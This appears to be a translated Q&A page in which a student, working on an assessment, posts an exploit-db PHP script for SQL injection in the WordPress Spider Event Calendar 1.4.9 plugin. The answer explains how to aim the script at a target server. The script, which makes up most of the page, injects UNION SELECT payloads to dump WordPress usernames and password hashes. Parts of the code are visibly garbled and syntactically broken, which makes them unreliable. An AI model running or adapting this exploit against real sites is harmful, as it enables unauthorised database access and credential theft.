如何解决PHP 中的问题 - WordPress 插件 Webdorado Spider 事件日历 1.4.9 - SQL 注入漏洞
作为评估的一部分,我们被要求对系统中已知的故障进行查找/编写代码来利用它。我选择了 sql 注入失败,但是当我执行代码(用 PHP 编写,我从未使用过)时,出现以下错误:“请将服务器(无协议)名称放入 SRV GET 变量中!”,我不能不明白也解决不了!
利用代码:https://www.exploit-db.com/exploits/36061
'''
<?PHP
/*
# Exploit Title: wordpress: Webdorado Spider Event Calendar <= 1.4.9 [sql Injection]
# Date: 2015-02-12
# Exploit Author: Mateusz Lach
# vendor Homepage: https://www.facebook.com/WebDorado or http://www.webdorado.com
# Software Link: https://downloads.wordpress.org/plugin/spider-event-calendar.1.4.9.zip
# Version: 1.4.9
# Tested on: OpenSUSE Linux + Chrome and Firefox,it's PHP application.
# CVE : CWE-89
# Owasp Top10: A1-Injection
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation,either version 3 of the License,or
(at your option) any later version.
This program is distributed in the hope that it will be useful,but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or fitness FOR A PARTIculaR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not,see <http://www.gnu.org/licenses/>.
# Exploit Title: wordpress: Webdorado Spider Event Calendar <= 1.4.9 [sql Injection]
# Date: 2015-02-12
# Exploit Author: Mateusz Lach
# vendor Homepage: https://www.facebook.com/WebDorado or http://www.webdorado.com
# Software Link: https://downloads.wordpress.org/plugin/spider-event-calendar.1.4.9.zip
# Version: 1.4.9
# Tested on: OpenSUSE Linux + Chrome and Firefox,it's PHP application.
# CVE : CWE-89
# Owasp Top10: A1-Injection
*/
define('FETCH_PREFIX_URL','http://%s/wp-admin/admin-ajax.PHP?action=spiderbigcalendar_month&theme_id=13&calendar=1&select=month,list,week,day,&date=2015-02&many_sp_calendar=1&cur_page_url=%s&cat_id=1)%%20UNION%%20SELECT%%20%s,1,%%20FROM_UNIXTIME(1423004400),(SELECT%%20CONCAT(CHAR(35,35,35),table_name,CHAR(35,35))%%20FROM%%20information_schema.tables%%20WHERE%%20table_name%%20LIKE%%20(%%20SELECT%%20CHAR(37,%%20117,%%20115,%%20101,%%20114,%%20115)%%20)%%20LIMIT%%201),%%20CHAR(110,%%20111,%%2095,%%20112,%%2097,%%20116),1%%20FROM%%20DUAL;--%%20--%%20&widget=0');
define('FETCH_USERS_URL',%%20CONCAT(CHAR(35,33,GROUP_CONCAT(%%20CONCAT(%%20CONCAT(user_login,%%2035),user_pass))),35)),%%201,1%%20as%%20fakeGroup%%20FROM%%20%s%%20GROUP%%20BY%%20fakeGroup;--%%20&widget=0');
define('FAKE_ID_TO_SEARCH',12345677654321);
define('PATTERN_TO_SEARCH','ev_ids='.FAKE_ID_TO_SEARCH);
define('PATTERN_TO_SEARCH_USERS','#!#!#!#');
define('ROW_SEParaTOR',',');
define('FIELD_SEParaTOR','##');
$server = $_GET['SRV'];
if (empty($server))
{
echo 'Please put server (without protocol) name in SRV GET variable!';
}
else
{
$fullURL = sprintf(FETCH_PREFIX_URL,$server,FAKE_ID_TO_SEARCH);
$prefixCurl = curl_init($fullURL);
curl_setopt($prefixCurl,CURLOPT_RETURNTRANSFER,true);
$result = curl_exec($prefixCurl);
if (stripos($result,PATTERN_TO_SEARCH) !== false)
{
preg_match('/####[a-zA-Z\_0-9]*####/',$result,$tableNames);
$tableName = str_replace('####','',$tableNames[0]);
echo 'tableName: '.$tableName.'<BR/>';
$fullURL = sprintf(FETCH_USERS_URL,FAKE_ID_TO_SEARCH,$tableName);
$usersCurl = curl_init($fullURL);
curl_setopt($usersCurl,true);
$result = curl_exec($usersCurl);
if (stripos($result,PATTERN_TO_SEARCH) !== false)
{
$from = stripos($result,PATTERN_TO_SEARCH_USERS);
$to = stripos($result,PATTERN_TO_SEARCH_USERS,$from + strlen(PATTERN_TO_SEARCH_USERS));
$result = substr($result,$from,$to-$from);
echo '<table><tr><td>'.str_replace(FIELD_SEParaTOR,'</td><td>',str_replace(ROW_SEParaTOR,'</td></tr><tr><td>',str_replace(PATTERN_TO_SEARCH_USERS,$result))).'</td></tr></table>';
}
else
{
echo 'Table name fetched,but not users - try to rewrite exploit :-(';
}
}
else
{
echo 'NOT vulnerable :-(';
}
}
'''
解决方法
您可以执行以下两种操作之一:
A.修改这个文件的代码你要指向你要查询的服务器:
变化:
$server = $_GET['SRV'];
致:
$server = 'theservertotest.com';
B.将服务器传递到您正在运行此 PHP 文件的 URL 的查询字符串中:
https://mysqlinject-testsite.com/exploit_test.php?SRV=theservertotest.com
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。